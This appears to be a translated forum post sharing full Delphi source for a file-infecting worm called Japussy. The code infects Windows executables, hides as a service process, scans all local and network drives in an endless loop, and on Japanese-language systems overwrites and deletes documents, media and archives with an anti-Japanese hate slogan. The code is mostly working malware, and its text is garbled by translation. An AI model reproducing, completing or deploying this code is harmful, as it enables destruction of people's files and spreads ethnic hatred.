I have read it. It was written in Delphi. According to the notes, it should be the D5SP1 version. I used D7SP1 to handle a few issues. The compilation was successful, but I didn't dare to try it, I don't know which one wants to try it. hey hey ..
Copy codeThe Code is as follows: program Japussy;
Uses
Windows, SysUtils, Classes, Graphics, ShellAPI {, Registry };
Const
HeaderSize = 82432; // the size of the virus.
IconOffset = $12EB8; // offset of the primary graph of the PE File
// The size obtained by compiling on my Delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
HeaderSize = 38912; // the size of the virus body compressed by Upx
IconOffset = $ 92BC; // the offset of the Upx compressed over the main graph of the PE File
// Upx 1.24 W usage: upx-9 -- 8086 Japussy.exe
}
IconSize = $2E8; // the size of the master image of the PE file, which is 744 bytes.
IconTail = IconOffset + IconSize; // end of the Main chart of the PE File
ID = $44444444; // infection mark
// LJ code for writing
Catchword = ''If a race need to be killed out, it must be Yamato.'' +
''If a country need to be destroyed, it must be Japan! ''+
''*** W32.Japussy. Worm. ***'';
{$ R *. RES}
Function RegisterServiceProcess (dwProcessID, dwType: Integer): Integer;
StDCall; external ''kernel32. dll ''; // function declaration
Var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; // Japanese OS tag
{Judge whether it is Win9x}
Function IsWin9x: Boolean;
Var
Ver: TOSVersionInfo;
Begin
Result: = False;
Ver. dwOSVersionInfoSize: = SizeOf (TOSVersionInfo );
If not GetVersionEx (Ver) then
Exit;
If (Ver. dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
Result: = True;
End;
{Copying between streams}
Procedure CopyStream (Src: TStream; sStartPos: Integer; Dst: TStream;
DStartPos: Integer; Count: Integer );
Var
SCurPos, dCurPos: Integer;
Begin
SCurPos: = Src. Position;
DCurPos: = Dst. Position;
Src. Seek (sStartPos, 0 );
Dst. Seek (dStartPos, 0 );
Dst. CopyFrom (Src, Count );
Src. Seek (sCurPos, 0 );
Dst. Seek (dCurPos, 0 );
End;
{Separating the host file from the infected PE file for use}
Procedure ExtractFile (FileName: string );
Var
SStream, dStream: TFileStream;
Begin
Try
SStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
DStream: = TFileStream. Create (FileName, fmCreate );
Try
SStream. Seek (HeaderSize, 0); // skip the virus section of the header
DStream. CopyFrom (sStream, sStream. Size-HeaderSize );
Finally
DStream. Free;
End;
Finally
SStream. Free;
End;
Except
End;
End;
{Fill STARTUPINFO structure}
Procedure FillStartupInfo (var Si: STARTUPINFO; State: Word );
Begin
Si. cb: = SizeOf (Si );
Si. lpReserved: = nil;
Si. lpDesktop: = nil;
Si. lpTitle: = nil;
Si. dwFlags: = STARTF_USESHOWWINDOW;
Si. wShowWindow: = State;
Si. cbReserved2: = 0;
Si. lpReserved2: = nil;
End;
{Mail with virus}
Procedure SendMail;
Begin
// Who is willing to do this?
End;
{Infected PE file}
Procedure InfectOneFile (FileName: string );
Var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
IID: LongInt;
AIcon: TIcon;
Infected, IsPE: Boolean;
I: Integer;
Buf: array [0 .. 1] of Char;
Begin
Try // if an error occurs, the file is in use and exits.
If CompareText (FileName, ''japussy. EXE '') = 0 then // do not infect yourself
Exit;
Infected: = False;
IsPE: = False;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
Try
For I: = 0 to $108 do // check the PE File Header
Begin
SrcStream. Seek (I, soFromBeginning );
SrcStream. Read (Buf, 2 );
If (Buf [0] = #80) and (Buf [1] = #69) then // PE tag
Begin
IsPE: = True; // It is a PE file.
Break;
End;
End;
SrcStream. Seek (-4, soFromEnd); // check the infection mark
SrcStream. Read (iID, 4 );
If (iID = ID) or (SrcStream. Size <10240) then // files that are too small are not infected
Infected: = True;
Finally
SrcStream. Free;
End;
If Infected or (not IsPE) then // exit if the file is Infected or not a PE File
Exit;
IcoStream: = TMemoryStream. Create;
DstStream: = TMemoryStream. Create;
Try
AIcon: = TIcon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
AIcon. ReleaseHandle;
AIcon. Handle: = ExtractIcon (HInstance, PChar (FileName), 0 );
AIcon. SaveToStream (IcoStream );
Finally
AIcon. Free;
End;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
// Header file
HdrStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
// Write data before the main icon of the virus.
CopyStream (HdrStream, 0, DstStream, 0, IconOffset );
// Write the main icon of the current program
CopyStream (IcoStream, 22, DstStream, IconOffset, IconSize );
// Write data between the main icon of the virus and the end of the virus.
CopyStream (HdrStream, IconTail, DstStream, IconTail, HeaderSize-IconTail );
// Write the Host Program
CopyStream (SrcStream, 0, DstStream, HeaderSize, SrcStream. Size );
// Write the infected mark
DstStream. Seek (0, 2 );
IID: = $44444444;
DstStream. Write (iID, 4 );
Finally
HdrStream. Free;
End;
Finally
SrcStream. Free;
IcoStream. Free;
DstStream. SaveToFile (FileName); // Replace the host file
DstStream. Free;
End;
Except;
End;
End;
{Write the target file to the LJ code and delete it}
Procedure SmashFile (FileName: string );
Var
FileHandle: Integer;
I, Size, Mass, Max, Len: Integer;
Begin
Try
SetFileAttributes (PChar (FileName), 0); // remove the read-only attribute
FileHandle: = FileOpen (FileName, fmOpenWrite); // open the file
Try
Size: = GetFileSize (FileHandle, nil); // File Size
I: = 0;
Randomize;
Max: = Random (15); // Random number of times the LJ code is written
If Max <5 then
Max: = 5;
Mass: = Size div Max; // Size of each interval Block
Len: = Length (Catchword );
While I <Max do
Begin
FileSeek (FileHandle, I * Mass, 0); // locate
// Write the LJ code to completely destroy the file
FileWrite (FileHandle, Catchword, Len );
Inc (I );
End;
Finally
FileClose (FileHandle); // close the file
End;
DeleteFile (PChar (FileName); // delete it
Except
End;
End;
{Get writable drive list}
Function GetDrives: string;
Var
DiskType: Word;
D: Char;
Str: string;
I: Integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = Chr (I + 65 );
Str: = D + ':';
DiskType: = GetDriveType (PChar (Str ));
// Obtain the local disk and Network Disk
If (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
Procedure LoopFiles (Path, Mask: string );
Var
I, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
Function IsValidDir (SearchRec: TSearchRec): Integer;
Begin
If (SearchRec. Attr '.') and
(SearchRec. Name <> '..') then
Result: = 0 // not a directory
Else if (SearchRec. Attr = 16) and (SearchRec. Name <> '.') and
(SearchRec. Name <> '..') then
Result: = 1 // not the root directory
Else Result: = 2; // the root directory.
End;
Begin
If (FindFirst (Path + Mask, faAnyFile, SearchRec) = 0) then
Begin
Repeat
PeekMessage (Msg, 0, 0, 0, PM_REMOVE); // adjust the message queue to avoid suspicion.
If IsValidDir (SearchRec) = 0 then
Begin
Fn: = Path + SearchRec. Name;
Ext: = UpperCase (ExtractFileExt (Fn ));
If (Ext = '. EXE') or (Ext = '. SCR') then
Begin
InfectOneFile (Fn); // infect the executable file
End
Else if (Ext = '. htm') or (Ext ='. HTML ') or (Ext ='. ASP ') then
Begin
// Infect HTML and ASP files and write Base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
End
Else if Ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
End
Else if Ext = '. ADC' then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
End
Else if Ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
End
Else
Begin
If IsJap then // the operating system of the plain text
Begin
If (Ext = '. DOC') or (Ext = '. XLS') or (Ext = '. MDB') or
(Ext = '. mp3') or (Ext ='. M') or (Ext = '. A') or
(Ext = '. wm') or (Ext ='. ZIP ') or (Ext ='. RAR ') or
(Ext = '. MPEG') or (Ext = '. asf') or (Ext ='. JPG ') or
(Ext = '. JPEG') or (Ext = '. GIF') or (Ext = '. SWF') or
(Ext = '. PDF') or (Ext = '. chm') or (Ext ='. avi') then
SmashFile (Fn); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
SubDir: = TStringList. Create;
If (FindFirst (Path + '*. *', faDirectory, SearchRec) = 0) then
Begin
Repeat
If IsValidDir (SearchRec) = 1 then
SubDir. Add (SearchRec. Name );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
Count: = SubDir. Count-1;
For I: = 0 to Count do
LoopFiles (Path + SubDir. Strings + '', Mask );
FreeAndNil (SubDir );
End;
{Traverse all files on the disk}
Procedure InfectFiles;
Var
DriverList: string;
I, Len: Integer;
Begin
If GetACP = 932 then // Japanese Operating System
IsJap: = True; // Let's die!
DriverList: = GetDrives; // obtain the writable disk list.
Len: = Length (DriverList );
While True do // Infinite Loop
Begin
For I: = Len downto 1 do // traverse each disk drive
LoopFiles (DriverList + ':', '*. *'); // infected
SendMail; // send a mail with a virus
Sleep (1000*60*5); // Sleep for 5 minutes
End;
End;
{Main program start}
Begin
If IsWin9x then // is Win9x
RegisterServiceProcess (GetCurrentProcessID, 1) // register as a service process
Else // WinNT
Begin
// Remote thread ing to Explorer process
// Which station is willing to complete?
End;
// If it is the original virus
If CompareText (ExtractFileName (ParamStr (0), 'Japussy.exe ') = 0 then
InfectFiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
TmpFile: = ParamStr (0); // create a temporary file
Delete (TmpFile, Length (TmpFile)-4, 4 );
TmpFile: = TmpFile + #32 + '.exe '; // real host file with one more space
ExtractFile (TmpFile); // separated
FillStartupInfo (Si, SW_SHOWDEFAULT );
CreateProcess (PChar (TmpFile), PChar (TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); // create a new process to run
InfectFiles; // infect and send emails
End;
End.